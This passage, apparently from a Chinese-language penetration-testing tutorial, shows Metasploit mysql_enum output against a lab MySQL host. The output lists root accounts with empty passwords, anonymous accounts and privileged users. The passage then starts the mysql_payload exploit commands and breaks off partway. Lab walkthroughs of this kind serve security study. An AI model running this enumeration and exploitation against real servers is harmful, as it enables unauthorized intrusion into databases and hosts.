class=\"hljs-ln-code\">\n<div class=\"hljs-ln-line\">[+] <span class=\"hljs-number\">192.168<\/span><span class=\"hljs-number\">.177<\/span><span class=\"hljs-number\">.144<\/span>:<span class=\"hljs-number\">3306<\/span> - <span class=\"hljs-attr\">User:<\/span> root <span class=\"hljs-attr\">Host:<\/span> ::<span class=\"hljs-number\">1<\/span> Password <span class=\"hljs-attr\">Hash:<\/span><\/div>\n<\/div>\n<\/li>\n<li>\n<div class=\"hljs-ln-numbers\">\n<div class=\"hljs-ln-line hljs-ln-n\" data-line-number=\"28\"><\/div>\n<\/div>\n<div class=\"hljs-ln-code\">\n<div class=\"hljs-ln-line\">[+] <span class=\"hljs-number\">192.168<\/span><span class=\"hljs-number\">.177<\/span><span class=\"hljs-number\">.144<\/span>:<span class=\"hljs-number\">3306<\/span> - <span class=\"hljs-attr\">User:<\/span> <span class=\"hljs-attr\">Host:<\/span> localhost Password <span class=\"hljs-attr\">Hash:<\/span><\/div>\n<\/div>\n<\/li>\n<li>\n<div class=\"hljs-ln-numbers\">\n<div class=\"hljs-ln-line hljs-ln-n\" data-line-number=\"29\"><\/div>\n<\/div>\n<div class=\"hljs-ln-code\">\n<div class=\"hljs-ln-line\">[+] <span class=\"hljs-number\">192.168<\/span><span class=\"hljs-number\">.177<\/span><span class=\"hljs-number\">.144<\/span>:<span class=\"hljs-number\">3306<\/span> - <span class=\"hljs-attr\">User:<\/span> root <span class=\"hljs-attr\">Host:<\/span> % Password <span class=\"hljs-attr\">Hash:<\/span><\/div>\n<\/div>\n<\/li>\n<li>\n<div class=\"hljs-ln-numbers\">\n<div class=\"hljs-ln-line hljs-ln-n\" data-line-number=\"30\"><\/div>\n<\/div>\n<div class=\"hljs-ln-code\">\n<div class=\"hljs-ln-line\">[*] <span class=\"hljs-number\">192.168<\/span><span class=\"hljs-number\">.177<\/span><span class=\"hljs-number\">.144<\/span>:<span class=\"hljs-number\">3306<\/span> - The following users have GRANT <span class=\"hljs-attr\">Privilege:<\/span><\/div>\n<\/div>\n<\/li>\n<li>\n<div class=\"hljs-ln-numbers\">\n<div class=\"hljs-ln-line hljs-ln-n\" data-line-number=\"31\"><\/div>\n<\/div>\n<div class=\"hljs-ln-code\">\n<div class=\"hljs-ln-line\">[*] <span class=\"hljs-number\">192.168<\/span><span class=\"hljs-number\">.177<\/span><span class=\"hljs-number\">.144<\/span>:<span class=\"hljs-number\">3306<\/span> - <span class=\"hljs-attr\">User:<\/span> root <span class=\"hljs-attr\">Host:<\/span> localhost<\/div>\n<\/div>\n<\/li>\n<li>\n<div class=\"hljs-ln-numbers\">\n<div class=\"hljs-ln-line hljs-ln-n\" data-line-number=\"32\"><\/div>\n<\/div>\n<div class=\"hljs-ln-code\">\n<div class=\"hljs-ln-line\">[*] <span class=\"hljs-number\">192.168<\/span><span class=\"hljs-number\">.177<\/span><span class=\"hljs-number\">.144<\/span>:<span class=\"hljs-number\">3306<\/span> - <span class=\"hljs-attr\">User:<\/span> root <span class=\"hljs-attr\">Host:<\/span> <span class=\"hljs-number\">127.0<\/span><span class=\"hljs-number\">.0<\/span><span class=\"hljs-number\">.1<\/span><\/div>\n<\/div>\n<\/li>\n<li>\n<div class=\"hljs-ln-numbers\">\n<div class=\"hljs-ln-line hljs-ln-n\" data-line-number=\"33\"><\/div>\n<\/div>\n<div class=\"hljs-ln-code\">\n<div class=\"hljs-ln-line\">[*] <span class=\"hljs-number\">192.168<\/span><span class=\"hljs-number\">.177<\/span><span class=\"hljs-number\">.144<\/span>:<span class=\"hljs-number\">3306<\/span> - <span class=\"hljs-attr\">User:<\/span> root <span class=\"hljs-attr\">Host:<\/span> ::<span class=\"hljs-number\">1<\/span><\/div>\n<\/div>\n<\/li>\n<li>\n<div class=\"hljs-ln-numbers\">\n<div class=\"hljs-ln-line hljs-ln-n\" data-line-number=\"34\"><\/div>\n<\/div>\n<div class=\"hljs-ln-code\">\n<div class=\"hljs-ln-line\">[*] <span class=\"hljs-number\">192.168<\/span><span class=\"hljs-number\">.177<\/span><span class=\"hljs-number\">.144<\/span>:<span class=\"hljs-number\">3306<\/span> - The following users have CREATE USER <span class=\"hljs-attr\">Privilege:<\/span><\/div>\n<\/div>\n<\/li>\n<li>\n<div class=\"hljs-ln-numbers\">\n<div class=\"hljs-ln-line hljs-ln-n\" data-line-number=\"35\"><\/div>\n<\/div>\n<div class=\"hljs-ln-code\">\n<div class=\"hljs-ln-line\">[*] <span class=\"hljs-number\">192.168<\/span><span class=\"hljs-number\">.177<\/span><span class=\"hljs-number\">.144<\/span>:<span class=\"hljs-number\">3306<\/span> - <span class=\"hljs-attr\">User:<\/span> root <span class=\"hljs-attr\">Host:<\/span> localhost<\/div>\n<\/div>\n<\/li>\n<li>\n<div class=\"hljs-ln-numbers\">\n<div class=\"hljs-ln-line hljs-ln-n\" data-line-number=\"36\"><\/div>\n<\/div>\n<div class=\"hljs-ln-code\">\n<div class=\"hljs-ln-line\">[*] <span class=\"hljs-number\">192.168<\/span><span class=\"hljs-number\">.177<\/span><span class=\"hljs-number\">.144<\/span>:<span class=\"hljs-number\">3306<\/span> - <span class=\"hljs-attr\">User:<\/span> root <span class=\"hljs-attr\">Host:<\/span> <span class=\"hljs-number\">127.0<\/span><span class=\"hljs-number\">.0<\/span><span class=\"hljs-number\">.1<\/span><\/div>\n<\/div>\n<\/li>\n<li>\n<div class=\"hljs-ln-numbers\">\n<div class=\"hljs-ln-line hljs-ln-n\" data-line-number=\"37\"><\/div>\n<\/div>\n<div class=\"hljs-ln-code\">\n<div class=\"hljs-ln-line\">[*] <span class=\"hljs-number\">192.168<\/span><span class=\"hljs-number\">.177<\/span><span class=\"hljs-number\">.144<\/span>:<span class=\"hljs-number\">3306<\/span> - <span class=\"hljs-attr\">User:<\/span> root <span class=\"hljs-attr\">Host:<\/span> ::<span class=\"hljs-number\">1<\/span><\/div>\n<\/div>\n<\/li>\n<li>\n<div class=\"hljs-ln-numbers\">\n<div class=\"hljs-ln-line hljs-ln-n\" data-line-number=\"38\"><\/div>\n<\/div>\n<div class=\"hljs-ln-code\">\n<div class=\"hljs-ln-line\">[*] <span class=\"hljs-number\">192.168<\/span><span class=\"hljs-number\">.177<\/span><span class=\"hljs-number\">.144<\/span>:<span class=\"hljs-number\">3306<\/span> - <span class=\"hljs-attr\">User:<\/span> root <span class=\"hljs-attr\">Host:<\/span> %<\/div>\n<\/div>\n<\/li>\n<li>\n<div class=\"hljs-ln-numbers\">\n<div class=\"hljs-ln-line hljs-ln-n\" data-line-number=\"39\"><\/div>\n<\/div>\n<div class=\"hljs-ln-code\">\n<div class=\"hljs-ln-line\">[*] <span class=\"hljs-number\">192.168<\/span><span class=\"hljs-number\">.177<\/span><span class=\"hljs-number\">.144<\/span>:<span class=\"hljs-number\">3306<\/span> - The following users have RELOAD <span class=\"hljs-attr\">Privilege:<\/span><\/div>\n<\/div>\n<\/li>\n<li>\n<div class=\"hljs-ln-numbers\">\n<div class=\"hljs-ln-line hljs-ln-n\" data-line-number=\"40\"><\/div>\n<\/div>\n<div class=\"hljs-ln-code\">\n<div class=\"hljs-ln-line\">[*] <span class=\"hljs-number\">192.168<\/span><span class=\"hljs-number\">.177<\/span><span class=\"hljs-number\">.144<\/span>:<span class=\"hljs-number\">3306<\/span> - <span class=\"hljs-attr\">User:<\/span> root <span class=\"hljs-attr\">Host:<\/span> localhost<\/div>\n<\/div>\n<\/li>\n<li>\n<div class=\"hljs-ln-numbers\">\n<div class=\"hljs-ln-line hljs-ln-n\" data-line-number=\"41\"><\/div>\n<\/div>\n<div class=\"hljs-ln-code\">\n<div class=\"hljs-ln-line\">[*] <span class=\"hljs-number\">192.168<\/span><span class=\"hljs-number\">.177<\/span><span class=\"hljs-number\">.144<\/span>:<span class=\"hljs-number\">3306<\/span> - <span class=\"hljs-attr\">User:<\/span> root <span class=\"hljs-attr\">Host:<\/span> <span class=\"hljs-number\">127.0<\/span><span class=\"hljs-number\">.0<\/span><span class=\"hljs-number\">.1<\/span><\/div>\n<\/div>\n<\/li>\n<li>\n<div class=\"hljs-ln-numbers\">\n<div class=\"hljs-ln-line hljs-ln-n\" data-line-number=\"42\"><\/div>\n<\/div>\n<div class=\"hljs-ln-code\">\n<div class=\"hljs-ln-line\">[*] <span class=\"hljs-number\">192.168<\/span><span class=\"hljs-number\">.177<\/span><span class=\"hljs-number\">.144<\/span>:<span class=\"hljs-number\">3306<\/span> - <span class=\"hljs-attr\">User:<\/span> root <span class=\"hljs-attr\">Host:<\/span> ::<span class=\"hljs-number\">1<\/span><\/div>\n<\/div>\n<\/li>\n<li>\n<div class=\"hljs-ln-numbers\">\n<div class=\"hljs-ln-line hljs-ln-n\" data-line-number=\"43\"><\/div>\n<\/div>\n<div class=\"hljs-ln-code\">\n<div class=\"hljs-ln-line\">[*] <span class=\"hljs-number\">192.168<\/span><span class=\"hljs-number\">.177<\/span><span class=\"hljs-number\">.144<\/span>:<span class=\"hljs-number\">3306<\/span> - <span class=\"hljs-attr\">User:<\/span> root <span class=\"hljs-attr\">Host:<\/span> %<\/div>\n<\/div>\n<\/li>\n<li>\n<div class=\"hljs-ln-numbers\">\n<div class=\"hljs-ln-line hljs-ln-n\" data-line-number=\"44\"><\/div>\n<\/div>\n<div class=\"hljs-ln-code\">\n<div class=\"hljs-ln-line\">[*] <span class=\"hljs-number\">192.168<\/span><span class=\"hljs-number\">.177<\/span><span class=\"hljs-number\">.144<\/span>:<span class=\"hljs-number\">3306<\/span> - The following users have SHUTDOWN <span class=\"hljs-attr\">Privilege:<\/span><\/div>\n<\/div>\n<\/li>\n<li>\n<div class=\"hljs-ln-numbers\">\n<div class=\"hljs-ln-line hljs-ln-n\" data-line-number=\"45\"><\/div>\n<\/div>\n<div class=\"hljs-ln-code\">\n<div class=\"hljs-ln-line\">[*] <span class=\"hljs-number\">192.168<\/span><span class=\"hljs-number\">.177<\/span><span class=\"hljs-number\">.144<\/span>:<span class=\"hljs-number\">3306<\/span> - <span class=\"hljs-attr\">User:<\/span> root <span class=\"hljs-attr\">Host:<\/span> localhost<\/div>\n<\/div>\n<\/li>\n<li>\n<div class=\"hljs-ln-numbers\">\n<div class=\"hljs-ln-line hljs-ln-n\" data-line-number=\"46\"><\/div>\n<\/div>\n<div class=\"hljs-ln-code\">\n<div class=\"hljs-ln-line\">[*] <span class=\"hljs-number\">192.168<\/span><span class=\"hljs-number\">.177<\/span><span class=\"hljs-number\">.144<\/span>:<span class=\"hljs-number\">3306<\/span> - <span class=\"hljs-attr\">User:<\/span> root <span class=\"hljs-attr\">Host:<\/span> <span class=\"hljs-number\">127.0<\/span><span class=\"hljs-number\">.0<\/span><span class=\"hljs-number\">.1<\/span><\/div>\n<\/div>\n<\/li>\n<li>\n<div class=\"hljs-ln-numbers\">\n<div class=\"hljs-ln-line hljs-ln-n\" data-line-number=\"47\"><\/div>\n<\/div>\n<div class=\"hljs-ln-code\">\n<div class=\"hljs-ln-line\">[*] <span class=\"hljs-number\">192.168<\/span><span class=\"hljs-number\">.177<\/span><span class=\"hljs-number\">.144<\/span>:<span class=\"hljs-number\">3306<\/span> - <span class=\"hljs-attr\">User:<\/span> root <span class=\"hljs-attr\">Host:<\/span> ::<span class=\"hljs-number\">1<\/span><\/div>\n<\/div>\n<\/li>\n<li>\n<div class=\"hljs-ln-numbers\">\n<div class=\"hljs-ln-line hljs-ln-n\" data-line-number=\"48\"><\/div>\n<\/div>\n<div class=\"hljs-ln-code\">\n<div class=\"hljs-ln-line\">[*] <span class=\"hljs-number\">192.168<\/span><span class=\"hljs-number\">.177<\/span><span class=\"hljs-number\">.144<\/span>:<span class=\"hljs-number\">3306<\/span> - <span class=\"hljs-attr\">User:<\/span> root <span class=\"hljs-attr\">Host:<\/span> %<\/div>\n<\/div>\n<\/li>\n<li>\n<div class=\"hljs-ln-numbers\">\n<div class=\"hljs-ln-line hljs-ln-n\" data-line-number=\"49\"><\/div>\n<\/div>\n<div class=\"hljs-ln-code\">\n<div class=\"hljs-ln-line\">[*] <span class=\"hljs-number\">192.168<\/span><span class=\"hljs-number\">.177<\/span><span class=\"hljs-number\">.144<\/span>:<span class=\"hljs-number\">3306<\/span> - The following users have SUPER <span class=\"hljs-attr\">Privilege:<\/span><\/div>\n<\/div>\n<\/li>\n<li>\n<div class=\"hljs-ln-numbers\">\n<div class=\"hljs-ln-line hljs-ln-n\" data-line-number=\"50\"><\/div>\n<\/div>\n<div class=\"hljs-ln-code\">\n<div class=\"hljs-ln-line\">[*] <span class=\"hljs-number\">192.168<\/span><span class=\"hljs-number\">.177<\/span><span class=\"hljs-number\">.144<\/span>:<span class=\"hljs-number\">3306<\/span> - <span class=\"hljs-attr\">User:<\/span> root <span class=\"hljs-attr\">Host:<\/span> localhost<\/div>\n<\/div>\n<\/li>\n<li>\n<div class=\"hljs-ln-numbers\">\n<div class=\"hljs-ln-line hljs-ln-n\" data-line-number=\"51\"><\/div>\n<\/div>\n<div class=\"hljs-ln-code\">\n<div class=\"hljs-ln-line\">[*] <span class=\"hljs-number\">192.168<\/span><span class=\"hljs-number\">.177<\/span><span class=\"hljs-number\">.144<\/span>:<span class=\"hljs-number\">3306<\/span> - <span class=\"hljs-attr\">User:<\/span> root <span class=\"hljs-attr\">Host:<\/span> <span class=\"hljs-number\">127.0<\/span><span class=\"hljs-number\">.0<\/span><span class=\"hljs-number\">.1<\/span><\/div>\n<\/div>\n<\/li>\n<li>\n<div class=\"hljs-ln-numbers\">\n<div class=\"hljs-ln-line hljs-ln-n\" data-line-number=\"52\"><\/div>\n<\/div>\n<div class=\"hljs-ln-code\">\n<div class=\"hljs-ln-line\">[*] <span class=\"hljs-number\">192.168<\/span><span class=\"hljs-number\">.177<\/span><span class=\"hljs-number\">.144<\/span>:<span class=\"hljs-number\">3306<\/span> - <span class=\"hljs-attr\">User:<\/span> root <span class=\"hljs-attr\">Host:<\/span> ::<span class=\"hljs-number\">1<\/span><\/div>\n<\/div>\n<\/li>\n<li>\n<div class=\"hljs-ln-numbers\">\n<div class=\"hljs-ln-line hljs-ln-n\" data-line-number=\"53\"><\/div>\n<\/div>\n<div class=\"hljs-ln-code\">\n<div class=\"hljs-ln-line\">[*] <span class=\"hljs-number\">192.168<\/span><span class=\"hljs-number\">.177<\/span><span class=\"hljs-number\">.144<\/span>:<span class=\"hljs-number\">3306<\/span> - <span class=\"hljs-attr\">User:<\/span> root <span class=\"hljs-attr\">Host:<\/span> %<\/div>\n<\/div>\n<\/li>\n<li>\n<div class=\"hljs-ln-numbers\">\n<div class=\"hljs-ln-line hljs-ln-n\" data-line-number=\"54\"><\/div>\n<\/div>\n<div class=\"hljs-ln-code\">\n<div class=\"hljs-ln-line\">[*] <span class=\"hljs-number\">192.168<\/span><span class=\"hljs-number\">.177<\/span><span class=\"hljs-number\">.144<\/span>:<span class=\"hljs-number\">3306<\/span> - The following users have FILE <span class=\"hljs-attr\">Privilege:<\/span><\/div>\n<\/div>\n<\/li>\n<li>\n<div class=\"hljs-ln-numbers\">\n<div class=\"hljs-ln-line hljs-ln-n\" data-line-number=\"55\"><\/div>\n<\/div>\n<div class=\"hljs-ln-code\">\n<div class=\"hljs-ln-line\">[*] <span class=\"hljs-number\">192.168<\/span><span class=\"hljs-number\">.177<\/span><span class=\"hljs-number\">.144<\/span>:<span class=\"hljs-number\">3306<\/span> - <span class=\"hljs-attr\">User:<\/span> root <span class=\"hljs-attr\">Host:<\/span> localhost<\/div>\n<\/div>\n<\/li>\n<li>\n<div class=\"hljs-ln-numbers\">\n<div class=\"hljs-ln-line hljs-ln-n\" data-line-number=\"56\"><\/div>\n<\/div>\n<div class=\"hljs-ln-code\">\n<div class=\"hljs-ln-line\">[*] <span class=\"hljs-number\">192.168<\/span><span class=\"hljs-number\">.177<\/span><span class=\"hljs-number\">.144<\/span>:<span class=\"hljs-number\">3306<\/span> - <span class=\"hljs-attr\">User:<\/span> root <span class=\"hljs-attr\">Host:<\/span> <span class=\"hljs-number\">127.0<\/span><span class=\"hljs-number\">.0<\/span><span class=\"hljs-number\">.1<\/span><\/div>\n<\/div>\n<\/li>\n<li>\n<div class=\"hljs-ln-numbers\">\n<div class=\"hljs-ln-line hljs-ln-n\" data-line-number=\"57\"><\/div>\n<\/div>\n<div class=\"hljs-ln-code\">\n<div class=\"hljs-ln-line\">[*] <span class=\"hljs-number\">192.168<\/span><span class=\"hljs-number\">.177<\/span><span class=\"hljs-number\">.144<\/span>:<span class=\"hljs-number\">3306<\/span> - <span class=\"hljs-attr\">User:<\/span> root <span class=\"hljs-attr\">Host:<\/span> ::<span class=\"hljs-number\">1<\/span><\/div>\n<\/div>\n<\/li>\n<li>\n<div class=\"hljs-ln-numbers\">\n<div class=\"hljs-ln-line hljs-ln-n\" data-line-number=\"58\"><\/div>\n<\/div>\n<div class=\"hljs-ln-code\">\n<div class=\"hljs-ln-line\">[*] <span class=\"hljs-number\">192.168<\/span><span class=\"hljs-number\">.177<\/span><span class=\"hljs-number\">.144<\/span>:<span class=\"hljs-number\">3306<\/span> - <span class=\"hljs-attr\">User:<\/span> root <span class=\"hljs-attr\">Host:<\/span> %<\/div>\n<\/div>\n<\/li>\n<li>\n<div class=\"hljs-ln-numbers\">\n<div class=\"hljs-ln-line hljs-ln-n\" data-line-number=\"59\"><\/div>\n<\/div>\n<div class=\"hljs-ln-code\">\n<div class=\"hljs-ln-line\">[*] <span class=\"hljs-number\">192.168<\/span><span class=\"hljs-number\">.177<\/span><span class=\"hljs-number\">.144<\/span>:<span class=\"hljs-number\">3306<\/span> - The following users have PROCESS <span class=\"hljs-attr\">Privilege:<\/span><\/div>\n<\/div>\n<\/li>\n<li>\n<div class=\"hljs-ln-numbers\">\n<div class=\"hljs-ln-line hljs-ln-n\" data-line-number=\"60\"><\/div>\n<\/div>\n<div class=\"hljs-ln-code\">\n<div class=\"hljs-ln-line\">[*] <span class=\"hljs-number\">192.168<\/span><span class=\"hljs-number\">.177<\/span><span class=\"hljs-number\">.144<\/span>:<span class=\"hljs-number\">3306<\/span> - <span class=\"hljs-attr\">User:<\/span> root <span class=\"hljs-attr\">Host:<\/span> localhost<\/div>\n<\/div>\n<\/li>\n<li>\n<div class=\"hljs-ln-numbers\">\n<div class=\"hljs-ln-line hljs-ln-n\" data-line-number=\"61\"><\/div>\n<\/div>\n<div class=\"hljs-ln-code\">\n<div class=\"hljs-ln-line\">[*] <span class=\"hljs-number\">192.168<\/span><span class=\"hljs-number\">.177<\/span><span class=\"hljs-number\">.144<\/span>:<span class=\"hljs-number\">3306<\/span> - <span class=\"hljs-attr\">User:<\/span> root <span class=\"hljs-attr\">Host:<\/span> <span class=\"hljs-number\">127.0<\/span><span class=\"hljs-number\">.0<\/span><span class=\"hljs-number\">.1<\/span><\/div>\n<\/div>\n<\/li>\n<li>\n<div class=\"hljs-ln-numbers\">\n<div class=\"hljs-ln-line hljs-ln-n\" data-line-number=\"62\"><\/div>\n<\/div>\n<div class=\"hljs-ln-code\">\n<div class=\"hljs-ln-line\">[*] <span class=\"hljs-number\">192.168<\/span><span class=\"hljs-number\">.177<\/span><span class=\"hljs-number\">.144<\/span>:<span class=\"hljs-number\">3306<\/span> - <span class=\"hljs-attr\">User:<\/span> root <span class=\"hljs-attr\">Host:<\/span> ::<span class=\"hljs-number\">1<\/span><\/div>\n<\/div>\n<\/li>\n<li>\n<div class=\"hljs-ln-numbers\">\n<div class=\"hljs-ln-line hljs-ln-n\" data-line-number=\"63\"><\/div>\n<\/div>\n<div class=\"hljs-ln-code\">\n<div class=\"hljs-ln-line\">[*] <span class=\"hljs-number\">192.168<\/span><span class=\"hljs-number\">.177<\/span><span class=\"hljs-number\">.144<\/span>:<span class=\"hljs-number\">3306<\/span> - <span class=\"hljs-attr\">User:<\/span> root <span class=\"hljs-attr\">Host:<\/span> %<\/div>\n<\/div>\n<\/li>\n<li>\n<div class=\"hljs-ln-numbers\">\n<div class=\"hljs-ln-line hljs-ln-n\" data-line-number=\"64\"><\/div>\n<\/div>\n<div class=\"hljs-ln-code\">\n<div class=\"hljs-ln-line\">[*] <span class=\"hljs-number\">192.168<\/span><span class=\"hljs-number\">.177<\/span><span class=\"hljs-number\">.144<\/span>:<span class=\"hljs-number\">3306<\/span> - The following accounts have privileges to the mysql <span class=\"hljs-attr\">database:<\/span><\/div>\n<\/div>\n<\/li>\n<li>\n<div class=\"hljs-ln-numbers\">\n<div class=\"hljs-ln-line hljs-ln-n\" data-line-number=\"65\"><\/div>\n<\/div>\n<div class=\"hljs-ln-code\">\n<div class=\"hljs-ln-line\">[*] <span class=\"hljs-number\">192.168<\/span><span class=\"hljs-number\">.177<\/span><span class=\"hljs-number\">.144<\/span>:<span class=\"hljs-number\">3306<\/span> - <span class=\"hljs-attr\">User:<\/span> root <span class=\"hljs-attr\">Host:<\/span> localhost<\/div>\n<\/div>\n<\/li>\n<li>\n<div class=\"hljs-ln-numbers\">\n<div class=\"hljs-ln-line hljs-ln-n\" data-line-number=\"66\"><\/div>\n<\/div>\n<div class=\"hljs-ln-code\">\n<div class=\"hljs-ln-line\">[*] <span class=\"hljs-number\">192.168<\/span><span class=\"hljs-number\">.177<\/span><span class=\"hljs-number\">.144<\/span>:<span class=\"hljs-number\">3306<\/span> - <span class=\"hljs-attr\">User:<\/span> root <span class=\"hljs-attr\">Host:<\/span> <span class=\"hljs-number\">127.0<\/span><span class=\"hljs-number\">.0<\/span><span class=\"hljs-number\">.1<\/span><\/div>\n<\/div>\n<\/li>\n<li>\n<div class=\"hljs-ln-numbers\">\n<div class=\"hljs-ln-line hljs-ln-n\" data-line-number=\"67\"><\/div>\n<\/div>\n<div class=\"hljs-ln-code\">\n<div class=\"hljs-ln-line\">[*] <span class=\"hljs-number\">192.168<\/span><span class=\"hljs-number\">.177<\/span><span class=\"hljs-number\">.144<\/span>:<span class=\"hljs-number\">3306<\/span> - <span class=\"hljs-attr\">User:<\/span> root <span class=\"hljs-attr\">Host:<\/span> ::<span class=\"hljs-number\">1<\/span><\/div>\n<\/div>\n<\/li>\n<li>\n<div class=\"hljs-ln-numbers\">\n<div class=\"hljs-ln-line hljs-ln-n\" data-line-number=\"68\"><\/div>\n<\/div>\n<div class=\"hljs-ln-code\">\n<div class=\"hljs-ln-line\">[*] <span class=\"hljs-number\">192.168<\/span><span class=\"hljs-number\">.177<\/span><span class=\"hljs-number\">.144<\/span>:<span class=\"hljs-number\">3306<\/span> - <span class=\"hljs-attr\">User:<\/span> root <span class=\"hljs-attr\">Host:<\/span> %<\/div>\n<\/div>\n<\/li>\n<li>\n<div class=\"hljs-ln-numbers\">\n<div class=\"hljs-ln-line hljs-ln-n\" data-line-number=\"69\"><\/div>\n<\/div>\n<div class=\"hljs-ln-code\">\n<div class=\"hljs-ln-line\">[*] <span class=\"hljs-number\">192.168<\/span><span class=\"hljs-number\">.177<\/span><span class=\"hljs-number\">.144<\/span>:<span class=\"hljs-number\">3306<\/span> - Anonymous Accounts are <span class=\"hljs-attr\">Present:<\/span><\/div>\n<\/div>\n<\/li>\n<li>\n<div class=\"hljs-ln-numbers\">\n<div class=\"hljs-ln-line hljs-ln-n\" data-line-number=\"70\"><\/div>\n<\/div>\n<div class=\"hljs-ln-code\">\n<div class=\"hljs-ln-line\">[*] <span class=\"hljs-number\">192.168<\/span><span class=\"hljs-number\">.177<\/span><span class=\"hljs-number\">.144<\/span>:<span class=\"hljs-number\">3306<\/span> - <span class=\"hljs-attr\">User:<\/span> <span class=\"hljs-attr\">Host:<\/span> localhost<\/div>\n<\/div>\n<\/li>\n<li>\n<div class=\"hljs-ln-numbers\">\n<div class=\"hljs-ln-line hljs-ln-n\" data-line-number=\"71\"><\/div>\n<\/div>\n<div class=\"hljs-ln-code\">\n<div class=\"hljs-ln-line\">[*] <span class=\"hljs-number\">192.168<\/span><span class=\"hljs-number\">.177<\/span><span class=\"hljs-number\">.144<\/span>:<span class=\"hljs-number\">3306<\/span> - The following accounts have empty <span class=\"hljs-attr\">passwords:<\/span><\/div>\n<\/div>\n<\/li>\n<li>\n<div class=\"hljs-ln-numbers\">\n<div class=\"hljs-ln-line hljs-ln-n\" data-line-number=\"72\"><\/div>\n<\/div>\n<div class=\"hljs-ln-code\">\n<div class=\"hljs-ln-line\">[*] <span class=\"hljs-number\">192.168<\/span><span class=\"hljs-number\">.177<\/span><span class=\"hljs-number\">.144<\/span>:<span class=\"hljs-number\">3306<\/span> - <span class=\"hljs-attr\">User:<\/span> root <span class=\"hljs-attr\">Host:<\/span> localhost<\/div>\n<\/div>\n<\/li>\n<li>\n<div class=\"hljs-ln-numbers\">\n<div class=\"hljs-ln-line hljs-ln-n\" data-line-number=\"73\"><\/div>\n<\/div>\n<div class=\"hljs-ln-code\">\n<div class=\"hljs-ln-line\">[*] <span class=\"hljs-number\">192.168<\/span><span class=\"hljs-number\">.177<\/span><span class=\"hljs-number\">.144<\/span>:<span class=\"hljs-number\">3306<\/span> - <span class=\"hljs-attr\">User:<\/span> root <span class=\"hljs-attr\">Host:<\/span> <span class=\"hljs-number\">127.0<\/span><span class=\"hljs-number\">.0<\/span><span class=\"hljs-number\">.1<\/span><\/div>\n<\/div>\n<\/li>\n<li>\n<div class=\"hljs-ln-numbers\">\n<div class=\"hljs-ln-line hljs-ln-n\" data-line-number=\"74\"><\/div>\n<\/div>\n<div class=\"hljs-ln-code\">\n<div class=\"hljs-ln-line\">[*] <span class=\"hljs-number\">192.168<\/span><span class=\"hljs-number\">.177<\/span><span class=\"hljs-number\">.144<\/span>:<span class=\"hljs-number\">3306<\/span> - <span class=\"hljs-attr\">User:<\/span> root <span class=\"hljs-attr\">Host:<\/span> ::<span class=\"hljs-number\">1<\/span><\/div>\n<\/div>\n<\/li>\n<li>\n<div class=\"hljs-ln-numbers\">\n<div class=\"hljs-ln-line hljs-ln-n\" data-line-number=\"75\"><\/div>\n<\/div>\n<div class=\"hljs-ln-code\">\n<div class=\"hljs-ln-line\">[*] <span class=\"hljs-number\">192.168<\/span><span class=\"hljs-number\">.177<\/span><span class=\"hljs-number\">.144<\/span>:<span class=\"hljs-number\">3306<\/span> - <span class=\"hljs-attr\">User:<\/span> <span class=\"hljs-attr\">Host:<\/span> localhost<\/div>\n<\/div>\n<\/li>\n<li>\n<div class=\"hljs-ln-numbers\">\n<div class=\"hljs-ln-line hljs-ln-n\" data-line-number=\"76\"><\/div>\n<\/div>\n<div class=\"hljs-ln-code\">\n<div class=\"hljs-ln-line\">[*] <span class=\"hljs-number\">192.168<\/span><span class=\"hljs-number\">.177<\/span><span class=\"hljs-number\">.144<\/span>:<span class=\"hljs-number\">3306<\/span> - <span class=\"hljs-attr\">User:<\/span> root <span class=\"hljs-attr\">Host:<\/span> %<\/div>\n<\/div>\n<\/li>\n<li>\n<div class=\"hljs-ln-numbers\">\n<div class=\"hljs-ln-line hljs-ln-n\" data-line-number=\"77\"><\/div>\n<\/div>\n<div class=\"hljs-ln-code\">\n<div class=\"hljs-ln-line\">[*] <span class=\"hljs-number\">192.168<\/span><span class=\"hljs-number\">.177<\/span><span class=\"hljs-number\">.144<\/span>:<span class=\"hljs-number\">3306<\/span> - The following accounts are not restricted by <span class=\"hljs-attr\">source:<\/span><\/div>\n<\/div>\n<\/li>\n<li>\n<div class=\"hljs-ln-numbers\">\n<div class=\"hljs-ln-line hljs-ln-n\" data-line-number=\"78\"><\/div>\n<\/div>\n<div class=\"hljs-ln-code\">\n<div class=\"hljs-ln-line\">[*] <span class=\"hljs-number\">192.168<\/span><span class=\"hljs-number\">.177<\/span><span class=\"hljs-number\">.144<\/span>:<span class=\"hljs-number\">3306<\/span> - <span class=\"hljs-attr\">User:<\/span> root <span class=\"hljs-attr\">Host:<\/span> %<\/div>\n<\/div>\n<\/li>\n<li>\n<div class=\"hljs-ln-numbers\">\n<div class=\"hljs-ln-line hljs-ln-n\" data-line-number=\"79\"><\/div>\n<\/div>\n<div class=\"hljs-ln-code\">\n<div class=\"hljs-ln-line\">[*] Auxiliary module execution completed<\/div>\n<\/div>\n<\/li>\n<li>\n<div class=\"hljs-ln-numbers\">\n<div class=\"hljs-ln-line hljs-ln-n\" data-line-number=\"80\"><\/div>\n<\/div>\n<div class=\"hljs-ln-code\">\n<div class=\"hljs-ln-line\">msf5 auxiliary(admin<span class=\"hljs-regexp\">\/mysql\/<\/span>mysql_enum) &gt;<\/div>\n<\/div>\n<\/li>\n<li>\n<div class=\"hljs-ln-numbers\">\n<div class=\"hljs-ln-line hljs-ln-n\" data-line-number=\"81\"><\/div>\n<\/div>\n<div class=\"hljs-ln-code\">\n<div class=\"hljs-ln-line\"><span class=\"copy-code-btn\">\u590d\u5236\u4ee3\u7801<\/span><\/div>\n<\/div>\n<\/li>\n<\/ol>\n<pre><code class=\"hljs linux copyable groovy\"><\/code><\/pre>\n<p>\u8fdb\u884c\u653b\u51fb\uff1a<\/p>\n<pre><code class=\"hljs linux copyable yaml\"><\/code><\/pre>\n<ol class=\"hljs-ln\">\n<li>\n<div class=\"hljs-ln-numbers\">\n<div class=\"hljs-ln-line hljs-ln-n\" data-line-number=\"1\"><\/div>\n<\/div>\n<div class=\"hljs-ln-code\">\n<div class=\"hljs-ln-line\"><span class=\"hljs-string\">msf5&gt;<\/span> <span class=\"hljs-string\">use<\/span> <span class=\"hljs-string\">exploit\/windows\/mysql\/mysql_payload<\/span><\/div>\n<\/div>\n<\/li>\n<li>\n<div class=\"hljs-ln-numbers\">\n<div class=\"hljs-ln-line hljs-ln-n\" data-line-number=\"2\"><\/div>\n<\/div>\n<div class=\"hljs-ln-code\">\n<div class=\"hljs-ln-line\"><span class=\"hljs-string\">msf5<\/span> <span class=\"hljs-string\">exploit(windows\/mysql\/mysql_payload)<\/span> <span 